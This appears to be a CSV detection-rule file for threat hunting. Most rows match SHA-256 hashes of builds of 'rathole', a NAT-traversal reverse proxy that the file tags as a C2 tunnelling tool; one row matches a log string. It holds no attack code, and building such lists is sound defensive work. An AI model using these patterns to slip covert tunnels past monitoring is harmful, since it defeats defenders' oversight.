"*bc375342f9360b0b5cbcb5a3701c301eaf577ec8ab5d1796cf10908d315edf72*",".{0,1000}bc375342f9360b0b5cbcb5a3701c301eaf577ec8ab5d1796cf10908d315edf72.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*bc4447977cdc9a765c2d6b61aada0fa40f45435aa68b193729cf4e7d8a94e891*",".{0,1000}bc4447977cdc9a765c2d6b61aada0fa40f45435aa68b193729cf4e7d8a94e891.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*bc680f0aa5ee457d60cb9d660071b3bb393f31c05c0e7fd7b89b39584ba25619*",".{0,1000}bc680f0aa5ee457d60cb9d660071b3bb393f31c05c0e7fd7b89b39584ba25619.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*bd158af8aa25d8f7123030620494c3296b96e56a1cc387bdf2274635335be867*",".{0,1000}bd158af8aa25d8f7123030620494c3296b96e56a1cc387bdf2274635335be867.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*bd7eb45070c8a4e1595e9daaf55bfc331e5ada1244c4ed496b89225e22429cf7*",".{0,1000}bd7eb45070c8a4e1595e9daaf55bfc331e5ada1244c4ed496b89225e22429cf7.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*bef64b382548fdcd24b4736f6a92c5c68e5b8555c897ed27d83ecf50f8117486*",".{0,1000}bef64b382548fdcd24b4736f6a92c5c68e5b8555c897ed27d83ecf50f8117486.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*c0386231b4e1b594981b572cd9859cde3f7fadd74729ef51107cd65999aa8f9e*",".{0,1000}c0386231b4e1b594981b572cd9859cde3f7fadd74729ef51107cd65999aa8f9e.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*c1e6d0a41a0af8589303ab6940937d9183b344a62283ff6033a17e82c357ce17*",".{0,1000}c1e6d0a41a0af8589303ab6940937d9183b344a62283ff6033a17e82c357ce17.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*c1fcfdac8ef03a170f6ec0f7baa30a470c61585c6e78a59cd73e6d50c9e6f5f9*",".{0,1000}c1fcfdac8ef03a170f6ec0f7baa30a470c61585c6e78a59cd73e6d50c9e6f5f9.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*c3d9753c93a5a4f6fdfd7c5146ffcb2ae4b733926b0ae3fff899d3b0851e0f60*",".{0,1000}c3d9753c93a5a4f6fdfd7c5146ffcb2ae4b733926b0ae3fff899d3b0851e0f60.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*c45bff01783f3f79df4d0c43b404ab3293e4e351fa760d7c9500200d5771d73a*",".{0,1000}c45bff01783f3f79df4d0c43b404ab3293e4e351fa760d7c9500200d5771d73a.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*c518a96dc78f8a6fb2ccecb02c5ab09bb41f0e04c8f7e7de8b87b3392d3083d7*",".{0,1000}c518a96dc78f8a6fb2ccecb02c5ab09bb41f0e04c8f7e7de8b87b3392d3083d7.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*c5fb70cf2c8a3681d7e8397c8ac82c119f5bd64055dd47432c5e5672ce9a3986*",".{0,1000}c5fb70cf2c8a3681d7e8397c8ac82c119f5bd64055dd47432c5e5672ce9a3986.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*c793af04a5ffa53c8dcde8f9453b312e40168de4081d64cbead076b8e7fcb0b9*",".{0,1000}c793af04a5ffa53c8dcde8f9453b312e40168de4081d64cbead076b8e7fcb0b9.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*c80c697470033dcb0c21c4c8bfb51f8514b4bfc10f3cc64e0960ed62420eb14f*",".{0,1000}c80c697470033dcb0c21c4c8bfb51f8514b4bfc10f3cc64e0960ed62420eb14f.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*c8ca4efbee070fbf92d8029eb0ab7b6debc91c4f7fc3fe6c578c416294807565*",".{0,1000}c8ca4efbee070fbf92d8029eb0ab7b6debc91c4f7fc3fe6c578c416294807565.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*c9404d48d63246380ae88630c327b603c5795542b4cc51287bea22a04bca46b5*",".{0,1000}c9404d48d63246380ae88630c327b603c5795542b4cc51287bea22a04bca46b5.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*c9673c278cbf55574c7a8d0c4e067e2d39b938d673b0d7332f58d28170ce267b*",".{0,1000}c9673c278cbf55574c7a8d0c4e067e2d39b938d673b0d7332f58d28170ce267b.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*ca6c79f236c29b8a923703800c1bc63ed8eb9d4e7f1951e9660bfdcc2b98e55e*",".{0,1000}ca6c79f236c29b8a923703800c1bc63ed8eb9d4e7f1951e9660bfdcc2b98e55e.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*cabd08e92a016eb971ebda7ee0954f8e2b9cc234a3a61e4c04ce6fa97798ff06*",".{0,1000}cabd08e92a016eb971ebda7ee0954f8e2b9cc234a3a61e4c04ce6fa97798ff06.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*cb548fc5c8a0eccd0a51a371d5ceb8abf994ea20a570d97cbd4592db6ac1919b*",".{0,1000}cb548fc5c8a0eccd0a51a371d5ceb8abf994ea20a570d97cbd4592db6ac1919b.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*ccfae00ec39b5da0ecd9b68049725f07ac4a340c837fd43468419a5a5929f103*",".{0,1000}ccfae00ec39b5da0ecd9b68049725f07ac4a340c837fd43468419a5a5929f103.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*ce30c574477d0b2527ccfe103b31d810f6c1aa8a83c08bfb5899214951d75c0d*",".{0,1000}ce30c574477d0b2527ccfe103b31d810f6c1aa8a83c08bfb5899214951d75c0d.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*ce9c03462b055ad6152b572662fbbc1febb19f9ce41f6ff7c7a2bfed51102166*",".{0,1000}ce9c03462b055ad6152b572662fbbc1febb19f9ce41f6ff7c7a2bfed51102166.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*d00b56fb9a39f27ad1c1b95a397861ab2d9898e13f60046669c72b875dcd43f4*",".{0,1000}d00b56fb9a39f27ad1c1b95a397861ab2d9898e13f60046669c72b875dcd43f4.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*d258f53b9e011e64920fb4f74c2cf0386993b9427de52c71b2147676422da83e*",".{0,1000}d258f53b9e011e64920fb4f74c2cf0386993b9427de52c71b2147676422da83e.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*d5f0bd19109ae3e6385b613848cc09bee2d9b9a853c56ee82b75c888a2369499*",".{0,1000}d5f0bd19109ae3e6385b613848cc09bee2d9b9a853c56ee82b75c888a2369499.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*dcb2717dd9c64e62a47b08565d50d43f8be857b9febd6f3a150941f95ce7ba44*",".{0,1000}dcb2717dd9c64e62a47b08565d50d43f8be857b9febd6f3a150941f95ce7ba44.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*dd4a876937f29c0732fe28b12d83372eab31a776a0a5c59f774190163bc6d442*",".{0,1000}dd4a876937f29c0732fe28b12d83372eab31a776a0a5c59f774190163bc6d442.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*dda6b391a168711d19c4499aba12c914e222dd053def0c21d054d66c53226bcc*",".{0,1000}dda6b391a168711d19c4499aba12c914e222dd053def0c21d054d66c53226bcc.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*e11c8f5673861b72e624373d2ebfed1cc50ebd59c8633da4b87a1e2361a53c02*",".{0,1000}e11c8f5673861b72e624373d2ebfed1cc50ebd59c8633da4b87a1e2361a53c02.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*e16e725b1a703f35d47a43e9c74996017703a65bcfd2fe042af15185ac856e29*",".{0,1000}e16e725b1a703f35d47a43e9c74996017703a65bcfd2fe042af15185ac856e29.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*e415807ec90293945012e78bfc528d3585e7672ca050cd3b56084e112c2d0249*",".{0,1000}e415807ec90293945012e78bfc528d3585e7672ca050cd3b56084e112c2d0249.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*e51c2e66cc4407d842afa1c1f700549da5efd37a6bd2dcc5c8094b777c72bc76*",".{0,1000}e51c2e66cc4407d842afa1c1f700549da5efd37a6bd2dcc5c8094b777c72bc76.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*e54a93d0138fae68b4876b8f9ba5f88d2ce5b0d238a7fca6925ad6d0aeac5d98*",".{0,1000}e54a93d0138fae68b4876b8f9ba5f88d2ce5b0d238a7fca6925ad6d0aeac5d98.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*e66e1d2a59507e235e6302d1a00e7bb3df833ba25b7151ef2d7521dbc1c2e3f3*",".{0,1000}e66e1d2a59507e235e6302d1a00e7bb3df833ba25b7151ef2d7521dbc1c2e3f3.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*e674a3b1a74f65ff587eef1080d3ce789484615f66af8c9c332231e9304f5220*",".{0,1000}e674a3b1a74f65ff587eef1080d3ce789484615f66af8c9c332231e9304f5220.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*e6a85ade86d4ae629e14eecf8883a618a8ddfd4c02bedc77cbb1a9e3219a56f0*",".{0,1000}e6a85ade86d4ae629e14eecf8883a618a8ddfd4c02bedc77cbb1a9e3219a56f0.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*e8662d80d2cc9acc5f8f4d8a1c1a5ff7717b2fa71919a405d0eed8b64c8c1d88*",".{0,1000}e8662d80d2cc9acc5f8f4d8a1c1a5ff7717b2fa71919a405d0eed8b64c8c1d88.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*eb23b507e63729581b16b35de2db0cad23cce0afc1de1018198066c20e5c0c20*",".{0,1000}eb23b507e63729581b16b35de2db0cad23cce0afc1de1018198066c20e5c0c20.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*ec79b650c290fdfc46a1c80359337ba7458eee334197d2aecac4a3b86db1a1ed*",".{0,1000}ec79b650c290fdfc46a1c80359337ba7458eee334197d2aecac4a3b86db1a1ed.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*ece4f9a9ae3d7823ed86c3dcc5540b02c7504904bbe0878d17cd7bbf71ac61ee*",".{0,1000}ece4f9a9ae3d7823ed86c3dcc5540b02c7504904bbe0878d17cd7bbf71ac61ee.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*ee5d276260040e43272cdf7c70c51e4a03a959e0bd4f3f4752edb02569c7736a*",".{0,1000}ee5d276260040e43272cdf7c70c51e4a03a959e0bd4f3f4752edb02569c7736a.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*f052586d3c8b6cecbafff4773c2a67a130c00ecdece4ea43f101923c53c28f58*",".{0,1000}f052586d3c8b6cecbafff4773c2a67a130c00ecdece4ea43f101923c53c28f58.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*f160f0e2319e8ead547548ccecdff561aea5b77a3bb00b387e1ddf3f1c3298db*",".{0,1000}f160f0e2319e8ead547548ccecdff561aea5b77a3bb00b387e1ddf3f1c3298db.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*f1c1f6e3dd1697be115ea8567fbed5f993832bc5e2400e69dbac6ccd95d02c61*",".{0,1000}f1c1f6e3dd1697be115ea8567fbed5f993832bc5e2400e69dbac6ccd95d02c61.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*f36b371ac6f48895384d78dc53d83daaf59d6f7086d5cb9ce7c74ba60ab81a0b*",".{0,1000}f36b371ac6f48895384d78dc53d83daaf59d6f7086d5cb9ce7c74ba60ab81a0b.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*f415f14b5c1f88971cfd80555ba1a0c77a437401a7bd623a616261b7985ac5c2*",".{0,1000}f415f14b5c1f88971cfd80555ba1a0c77a437401a7bd623a616261b7985ac5c2.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*f43398d585caae28761b340c083216b2dda0898667161c5a43f587cea8b7f799*",".{0,1000}f43398d585caae28761b340c083216b2dda0898667161c5a43f587cea8b7f799.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*f4a0d07aa0dd0cb020a0d3273a615107ddb15ca8264577ac4c22e41cad47a2c2*",".{0,1000}f4a0d07aa0dd0cb020a0d3273a615107ddb15ca8264577ac4c22e41cad47a2c2.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*f57034e42cba38366cfc0a304f16b1c1412419e322560d589d6b896312acde7f*",".{0,1000}f57034e42cba38366cfc0a304f16b1c1412419e322560d589d6b896312acde7f.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*f889e16f7550565628be5da507bbf33ab1fca61ab3541015fbb7a120a3a9cc29*",".{0,1000}f889e16f7550565628be5da507bbf33ab1fca61ab3541015fbb7a120a3a9cc29.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*f9b0e8b9bdc130652b4ec4c86a9c2d03dc85bd2057401970ff34cb5284581b90*",".{0,1000}f9b0e8b9bdc130652b4ec4c86a9c2d03dc85bd2057401970ff34cb5284581b90.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*fa4a6fc63d86f8f1faa7c103a845e4715ce79a048455c0eec897b27237576564*",".{0,1000}fa4a6fc63d86f8f1faa7c103a845e4715ce79a048455c0eec897b27237576564.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*Failed to run the pingpong server for testing: *",".{0,1000}Failed\sto\srun\sthe\spingpong\sserver\sfor\stesting\:\s.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*fb75480462e81fe6c0d821641057d0534989a45452feb66851bf781e42e82ef5*",".{0,1000}fb75480462e81fe6c0d821641057d0534989a45452feb66851bf781e42e82ef5.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*fc3b41639946509efb1f6835bc2da2233482f71859031aeb73006967ef5d7b66*",".{0,1000}fc3b41639946509efb1f6835bc2da2233482f71859031aeb73006967ef5d7b66.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*fc6b0a57727383a1491591f8e9ee76b1e0e25ecf7c2736b803d8f4411f651a15*",".{0,1000}fc6b0a57727383a1491591f8e9ee76b1e0e25ecf7c2736b803d8f4411f651a15.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*fd243d10718135287eb1a555427abf58fdf9cabad14d08d31815763479b877dd*",".{0,1000}fd243d10718135287eb1a555427abf58fdf9cabad14d08d31815763479b877dd.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*fe24df06821a78f1ccc81a8459ed13a14558b632908b266864257636e4fa8812*",".{0,1000}fe24df06821a78f1ccc81a8459ed13a14558b632908b266864257636e4fa8812.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
